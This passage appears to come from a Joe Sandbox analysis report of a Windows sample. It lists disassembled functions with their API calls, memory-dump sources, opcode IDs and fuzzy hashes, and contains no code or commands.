                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250058723.0000000000571000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250098533.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250134047.0000000000580000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_260000_file.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Initialize
                                                                                                                                                                                                                                          • String ID: c13L
                                                                                                                                                                                                                                          • API String ID: 2538663250-2793365725
                                                                                                                                                                                                                                          • Opcode ID: 2fdc08d9cd3290d78cb3de73233e3242bd5af7ef6e1cc30da4c964a22a84d08e
                                                                                                                                                                                                                                          • Instruction ID: 9afb5b1e0c9600e6d82159b647cad76aa22696055772563b9c783181e041add1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2fdc08d9cd3290d78cb3de73233e3242bd5af7ef6e1cc30da4c964a22a84d08e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1BB10670A10268DFEB29CF14C998BDEB7B5EF05304F9085D9E409A7281D775AAC8CF90
                                                                                                                                                                                                                                          Function 0029B04B Relevance: 1.5, APIs: 1, Instructions: 33memoryCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000,?,00000004,?,002A5024,?,00000000,?,0029EE3F,?,00000004,00000000,?,?,?,00299714), ref: 0029B07E
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2246085921.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246049309.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246085921.00000000002C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246156943.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246171958.00000000002CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246187307.00000000002D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246280736.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246296195.0000000000433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246315142.000000000044C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246329526.000000000044E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246342884.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246342884.0000000000459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246375725.000000000045D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246391924.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246407529.0000000000461000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246420883.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246435523.000000000046B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246450285.0000000000472000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246467590.0000000000484000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246481169.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246496664.0000000000486000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246521083.0000000000487000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246574589.0000000000493000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246670011.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246687981.00000000004B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246700751.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246717295.00000000004CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246740921.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246758025.00000000004D3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246777646.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246800494.00000000004DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246817975.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246830145.00000000004E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246844988.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246856860.00000000004EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246868633.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246879270.00000000004F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246889724.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246904342.00000000004F3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247007513.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247050358.0000000000512000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247336648.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248037647.000000000051D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248131120.000000000051E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248131120.000000000053B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249336954.0000000000569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249401509.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249671405.000000000056F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250058723.0000000000571000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250098533.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250134047.0000000000580000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_260000_file.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                                                                                                          • Opcode ID: 0c7e880dda4f22eda460ac1b98f7e6ad89d4fccd18201533563ac44ae9e0f482
                                                                                                                                                                                                                                          • Instruction ID: 7dd6b28cb5ce26cb1efd3c7693c028b8fd7e921d6edb0ddae71284908b9875ad
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0c7e880dda4f22eda460ac1b98f7e6ad89d4fccd18201533563ac44ae9e0f482
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 91E06D3517122796EE323A75AE89B6FA648DB423F0F151221EE6496190EB61DC3085E1
                                                                                                                                                                                                                                          Function 002687B2 Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetFileAttributesA.KERNEL32(?,0026DA1D,?,?,?,?), ref: 002687B9
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2246085921.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246049309.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246085921.00000000002C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246156943.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246171958.00000000002CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246187307.00000000002D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246280736.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246296195.0000000000433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246315142.000000000044C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246329526.000000000044E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246342884.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246342884.0000000000459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246375725.000000000045D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246391924.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246407529.0000000000461000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246420883.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246435523.000000000046B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246450285.0000000000472000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246467590.0000000000484000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246481169.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246496664.0000000000486000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246521083.0000000000487000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246574589.0000000000493000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246670011.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246687981.00000000004B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246700751.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246717295.00000000004CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246740921.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246758025.00000000004D3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246777646.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246800494.00000000004DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246817975.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246830145.00000000004E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246844988.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246856860.00000000004EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246868633.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246879270.00000000004F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246889724.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246904342.00000000004F3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247007513.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247050358.0000000000512000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247336648.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248037647.000000000051D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248131120.000000000051E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248131120.000000000053B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249336954.0000000000569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249401509.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249671405.000000000056F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250058723.0000000000571000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250098533.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250134047.0000000000580000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_260000_file.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AttributesFile
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                                                                                                                          • Opcode ID: 2f8720c1563c910d237564e9f16c4c3290dc0def88621290c8ea266ae70fcd41
                                                                                                                                                                                                                                          • Instruction ID: d588f02ac3a94c82702be6d2984fd3610c6d20e6f40385d706a089053db12aa5
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2f8720c1563c910d237564e9f16c4c3290dc0def88621290c8ea266ae70fcd41
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DEC08C2C03160189FD2D0D3802858A973494A477A83F41BC4E5704B1F1CE3578AB9210
                                                                                                                                                                                                                                          Function 002687B0 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetFileAttributesA.KERNEL32(?,0026DA1D,?,?,?,?), ref: 002687B9
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2246085921.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246049309.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246085921.00000000002C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246156943.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246171958.00000000002CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246187307.00000000002D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246280736.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246296195.0000000000433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246315142.000000000044C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246329526.000000000044E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246342884.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246342884.0000000000459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246375725.000000000045D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246391924.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246407529.0000000000461000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246420883.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246435523.000000000046B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246450285.0000000000472000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246467590.0000000000484000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246481169.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246496664.0000000000486000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246521083.0000000000487000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246574589.0000000000493000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246670011.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246687981.00000000004B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246700751.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246717295.00000000004CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246740921.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246758025.00000000004D3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246777646.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246800494.00000000004DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246817975.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246830145.00000000004E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246844988.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246856860.00000000004EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246868633.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246879270.00000000004F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246889724.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246904342.00000000004F3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247007513.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247050358.0000000000512000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247336648.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248037647.000000000051D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248131120.000000000051E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248131120.000000000053B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249336954.0000000000569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249401509.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249671405.000000000056F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250058723.0000000000571000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250098533.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250134047.0000000000580000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_260000_file.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AttributesFile
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                                                                                                                          • Opcode ID: bf1cf82ccb378b1f284b3089f50ab201182eccf75e73c2803b717ae45daefd04
                                                                                                                                                                                                                                          • Instruction ID: 493ea10bf08b8ddeb6a0b267033992cb520f57dd5fee26d7cce62f28edf5c35d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bf1cf82ccb378b1f284b3089f50ab201182eccf75e73c2803b717ae45daefd04
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 44C08C3C031201CAFA2D4E38428482972099A037283F00B88E5314B1F1CF32E8A7C6A0
                                                                                                                                                                                                                                          Function 04AC06C3 Relevance: .1, Instructions: 126COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2252627762.0000000004AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4ac0000_file.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 52787c71c6cc55b373a9516f8c8287118409d796ea35997848f66e54eef75ee6
                                                                                                                                                                                                                                          • Instruction ID: 0e8ef854a2bfb3ffc92aedd6b7e0126d3098f0db312f709ab1d4c6c3073b08f9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 52787c71c6cc55b373a9516f8c8287118409d796ea35997848f66e54eef75ee6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C721F1FB28C654FDA28685C22B60AF63B3DE6C3730330806FF447D9042F2941A0976B2
                                                                                                                                                                                                                                          Function 04AC06F3 Relevance: .1, Instructions: 108COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2252627762.0000000004AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4ac0000_file.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 8f8e4f2d59feddb0a643bac716adaf7ed6b2227feafeee4b3dee252bdb322a9e
                                                                                                                                                                                                                                          • Instruction ID: 9b1de60e0994034ba50528edd9080d1b3e257d033ce39d68733fc8a0851d8ccb
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8f8e4f2d59feddb0a643bac716adaf7ed6b2227feafeee4b3dee252bdb322a9e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E211BBFB38C625FD308689D22B60AF62A3EE1D3730331C42EF407D5002F2846A4A79B1
                                                                                                                                                                                                                                          Function 04AC06DE Relevance: .1, Instructions: 96COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2252627762.0000000004AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4ac0000_file.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 4998b47e97684f714baf413db5078ab12ec1e2764857e4733d8084b855a2d3de
                                                                                                                                                                                                                                          • Instruction ID: ddee381b06eba620cca31bf7d426d5826fa94a5b90ab37c1f51411e410ed7177
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4998b47e97684f714baf413db5078ab12ec1e2764857e4733d8084b855a2d3de
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2711CAFB38C614FD618694C22B60AF63A7EE2D3730331C02EF447D5002F2906A4A7AB1
                                                                                                                                                                                                                                          Function 04AC0720 Relevance: .1, Instructions: 76COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2252627762.0000000004AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4ac0000_file.jbxd
